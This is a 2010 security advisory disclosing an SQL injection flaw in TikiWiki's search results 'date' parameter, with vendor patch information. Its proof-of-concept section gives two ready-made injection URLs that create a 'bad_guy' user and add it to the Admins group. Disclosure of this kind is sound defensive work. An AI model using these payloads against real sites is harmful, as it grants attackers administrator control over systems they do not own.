Product:	TikiWiki CMS/Groupware, 
Versions:	4.1, 3.4 LTS (Other versions may also be affected)
Vendor:		http://info.tikiwiki.org/
Impact:		SQL injection Vulnerability
Severity:	HIGH
Authors: 	Mateusz Drygas <mateusz@man.poznan.pl> 
		http://security.psnc.pl/
Advisory:	http://security.psnc.pl/advisories/tikiwiki-4.1.txt


[ISSUE]

The search module in TikiWiki portal is prone to an SQL-injection vulnerability, 
which can be exploited by malicious people to conduct SQL injection attacks.


[DETAILS]

It was found that TikiWiki CMS/Groupware does not validate properly the "date" parameter value.
http://[HOST]/?tiki-searchresults.php?highlight=misja&date=1 month));[SQLi]


[POC]

http://[HOST]/tiki-searchresults.php?highlight=misja&date=1 month)); INSERT INTO users_users(email,login,password,hash) VALUES ('','bad_guy','lsjfsofasgfs',md5('lsjfsofasgfslsjfsofasgfs'));;--&search=>>
http://[HOST]/tiki-searchresults.php?highlight=misja&date=1 month)); INSERT INTO users_usergroups (`userId`, `groupName`) VALUES([user_id],'Admins');;--&search=>>


[SOLUTION]

Edit the source code to ensure that input is properly sanitized.
Update to Version 4.2 or 3.5 LTS or later

[SUMMARY]

Vendor has been informed about these bugs.
Have a nice day.

    Copyright 2010, Mateusz Drygas, PSNC Security Team . All rights reserved.